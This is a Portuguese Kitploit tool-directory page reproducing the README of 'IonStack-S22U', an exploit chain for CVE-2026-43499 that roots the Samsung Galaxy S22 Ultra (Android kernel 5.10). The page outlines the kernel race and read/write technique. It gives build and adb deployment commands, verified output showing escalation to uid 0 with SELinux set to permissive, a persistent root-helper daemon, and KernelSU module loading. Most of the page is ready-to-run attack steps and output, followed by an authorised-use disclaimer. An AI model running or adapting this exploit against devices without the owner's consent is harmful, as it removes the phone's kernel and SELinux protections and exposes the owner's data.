Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
IonStack-S22U — Cadeia de exploração completa do CVE-2026-43499 para o Samsung Galaxy S22 Ultra (kernel Android 5.10) | Kitploit
Ferramentas/GitHubGitHub/sarabpal-dev/ionstack-s22u
Segurança AndroidEscalada de PrivilégiosExploraçãoPós-ExploraçãoSegurança MóvelExploração de Binários
GitHubsarabpal-dev/ionstack-s22u

IonStack-S22U

Cadeia de exploração completa do CVE-2026-43499 para o Samsung Galaxy S22 Ultra (kernel Android 5.10)

Ver Repositório
417há 19h 48mRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-43499 - Galaxy S22 Ultra

https://github.com/user-attachments/assets/f3d0858d-f8f5-444f-8ae5-541c2bc744c3

Este repositório contém uma adaptação específica para o dispositivo do exploit CVE-2026-43499 para o Samsung Galaxy S22 Ultra (SM-S908W).

Alvo suportado

root@kitploit:~
Device: Samsung Galaxy S22 Ultra (SM-S908W)
Codename: b0q
Android: 15 / SDK 35
Build number: AP3A.240905.015.A2.S908WVLS8FYG7
Build display ID: AP3A.240905.015.A2.S908WVLS8FYG7
Build fingerprint: samsung/b0qcsx/b0q:15/AP3A.240905.015.A2/S908WVLS8FYG7:user/release-keys
Kernel: 5.10.226-android12-9-30958166-abS908WVLS8FYG7
Architecture: aarch64

Os offsets e layouts de estruturas neste repositório são específicos do firmware acima. Outros modelos e versões de firmware não são suportados por este perfil de alvo.

Fonte de referência

Esta adaptação é baseada na implementação do exploit publicada em:

  • NebuSec/CyberMeowfia — IonStack/CVE-2026-43499/exploit
  • BuSung-dev/CVE-2026-43499-S25U
  • Revisão upstream usada como base da adaptação: b850d3bddc74c3328d5fbcc0568d21962b55d949

Agradecimentos especiais a:

  • F-19-F/IonStackQuest3

A licença Apache 2.0 upstream é mantida em LICENSE.

Principais alterações da adaptação

  • Exploit adaptado do kernel v6.6 (Galaxy S25 Ultra) para o kernel Android v5.10 (Galaxy S22 Ultra / b0q).
  • Adicionados os offsets de alvo b0q / S908WVLS8FYG7 (src/targets/S908WVLS8FYG7/target.h) e os layouts de estruturas do kernel.
  • Substituída a condição de corrida do pselect pela rota exp32: coreografia de futex, carimbo de pilha de 32 bits e execução de sched_setattr em um estágio filho de 32 bits embutido (src/exp32/).
  • Adicionada recuperação automática do slide KASLR baseada em tracefs para o kernel Samsung.
  • Adaptados o layout de waiter/task PI falsos, o estágio CFI/FOPS e a primitiva de leitura/escrita física para v5.10.
  • Adicionado um caminho de root via user-mode-helper system_unbound_wq seguro para KDP e atualizado o alvo de enforcement do SELinux em tempo de execução para selinux_state.enforcing.
  • Adicionado um auxiliar de comandos root baseado em socket em /data/local/tmp/cve-2026-43499-root.
  • Restaura o ponteiro global ashmem FOPS imediatamente após estabelecer a primitiva arbitrária de leitura/escrita.
  • Mantém as páginas recuperadas em um processo destacado cve43499-hold após o sucesso, para que referências pendentes do kernel não possam ser recicladas em objetos slab não relacionados.

Compilação

Defina ANDROID_NDK_HOME para Android NDK r27+ ou um toolchain compatível e execute:

root@kitploit:~
make PROJECT=S908WVLS8FYG7 clean preload root-helper

Para compilar para um ambiente QEMU executando o kernel Android com um sistema de arquivos Buildroot:

  • Buildroot Toolchain Release: Baixe o toolchain de sarabpal-dev/qemu Release (samsung-v1)
  • QEMU Kernel Execution Guide: Guia de configuração e execução em QEMU Samsung README
root@kitploit:~
make USE_BUILDROOT=1 PROJECT=S908WVLS8FYG7 clean preload root-helper

Saídas:

root@kitploit:~
build/S908WVLS8FYG7/bin/cve-2026-43499
build/S908WVLS8FYG7/bin/cve-2026-43499-root
build/S908WVLS8FYG7/bin/cve-exp32

Implantação

root@kitploit:~
adb push build/S908WVLS8FYG7/bin/cve-2026-43499 /data/local/tmp/cve-2026-43499
adb push build/S908WVLS8FYG7/bin/cve-2026-43499-root /data/local/tmp/cve-2026-43499-root
adb push build/S908WVLS8FYG7/bin/cve-exp32 /data/local/tmp/cve-exp32
adb shell chmod 755 /data/local/tmp/cve-2026-43499 /data/local/tmp/cve-2026-43499-root /data/local/tmp/cve-exp32

Execução

Execute o estágio do exploit para iniciar o daemon root:

root@kitploit:~
adb shell "LD_PRELOAD=/data/local/tmp/cve-2026-43499 sh"

Após o sucesso, obtenha um shell root interativo de qualquer lugar no dispositivo:

root@kitploit:~
adb shell "/data/local/tmp/cve-2026-43499-root"

Ou execute comandos root diretamente:

root@kitploit:~
adb shell "/data/local/tmp/cve-2026-43499-root -c 'id'"

A execução padrão faz até 16 tentativas independentes. Cada processo filho com falha encerra antes da próxima tentativa, de modo que seus descritores de arquivo e alocações de modelagem de heap são liberados em vez de se acumularem dentro de um único processo de exploit de longa duração. O atraso base padrão é de 20000 microssegundos e o supervisor percorre a seguinte sequência duas vezes:

root@kitploit:~
20000, 30000, 50000, 25000, 40000, 15000, 60000, 35000

Substitua o número de tentativas ou o atraso base ao coletar dados de tempo:

root@kitploit:~
adb shell "EXPLOIT_ATTEMPTS=24 PSELECT_DELAY_USEC=20000 LD_PRELOAD=/data/local/tmp/cve-2026-43499 sh"

Resultado verificado em S908WVLS8FYG7:

root@kitploit:~
[*] root umh result wake=1 complete=1 retval=0 socket=1
[+] pipe-physrw-summary pid=5011 done=1 root=1 kaslr=1 base=ffffffc0080d8000 slide=00000000000d8000
[+] pipe physrw pid=5011 done=1 root=1 kaslr=1 read_ok=1 write_ok=1 rw64=1/1 uid=2000->0
[+] stability keeper pid=28206 retaining reclaimed kernel pages
[+] exploit completed attempt=1/16

Sessão interativa de shell root:

root@kitploit:~
b0q:/data/local/tmp $ ./cve-2026-43499-root                              
:/ # id
uid=0(root) gid=0(root) groups=0(root) context=u:r:kernel:s0
:/ # getenforce
Permissive

O estágio inicial é baseado em condição de corrida. Um filho que encerra com root=0 é tentado novamente automaticamente. A execução bem-sucedida restaura ashmem_misc.fops, alterna o SELinux para permissivo e inicia o daemon auxiliar de root até a próxima reinicialização.

Root persistente com KernelSU-Next

O exploit acima só mantém o root para o boot atual. Para obter um app Manager e controle no estilo su pelo restante da sessão, carregue o KernelSU-Next como um módulo de kernel de carregamento tardio por meio do auxiliar de root.

  1. Baixe os dois assets de lançamento de v3.3.0-android12-5.10:

    • KernelSU_Next_v3.3.0-release.apk — aplicativo Manager
    • kernelsu-android12-5.10.ko — módulo de kernel LKM
  2. Instale o APK do Manager:

root@kitploit:~
adb install KernelSU_Next_v3.3.0-release.apk
  1. Envie o módulo e carregue-o por meio do auxiliar de root obtido acima:
root@kitploit:~
adb push kernelsu-android12-5.10.ko /data/local/tmp/kernelsu-android12-5.10.ko
adb shell "/data/local/tmp/cve-2026-43499-root -c 'insmod /data/local/tmp/kernelsu-android12-5.10.ko'"
  1. Abra o aplicativo KernelSU Next no dispositivo — ele deve detectar o módulo carregado e expor o gerenciamento de superusuário, suporte a módulos/Zygisk e ksud soft-reboot.

Como este é um LKM carregado tardiamente (não uma imagem de boot corrigida), ele não sobrevive a uma reinicialização — você precisará executar o exploit novamente e reexecutar o insmod do módulo toda vez que o dispositivo reiniciar.

[!WARNING] Aviso de Confiabilidade e Kernel Panic: O estágio de corrida é sensível à temporização e atualmente não é confiável — pode falhar ou causar kernel panic na maioria das execuções. Seja paciente, pois boots limpos oferecem uma taxa de sucesso maior. Otimizações futuras podem ser lançadas para melhorar a confiabilidade.

[!TIP] Recomendações de Estabilidade e Taxa de Sucesso:

  • Reinicie o Dispositivo: Para a maior taxa de sucesso, reinicie o dispositivo antes de executar o exploit para garantir um estado limpo de slab/heap.
  • Feche os Aplicativos em Segundo Plano: Garanta que todos os aplicativos em segundo plano estejam fechados.
  • Desbloqueie a Tela e Fique Ocioso: Mantenha o dispositivo desbloqueado e não interaja nem use o telefone enquanto o exploit estiver em execução, pois entrada ativa do usuário/tarefas em segundo plano podem perturbar a temporização e potencialmente desencadear um kernel panic.

Use apenas em dispositivos que você possui ou para os quais tem autorização explícita para testar.

Baixar ferramenta
  • Executa tentativas de corrida com falha em processos filhos independentes e tenta novamente automaticamente com uma sequência de atrasos ajustada para o dispositivo.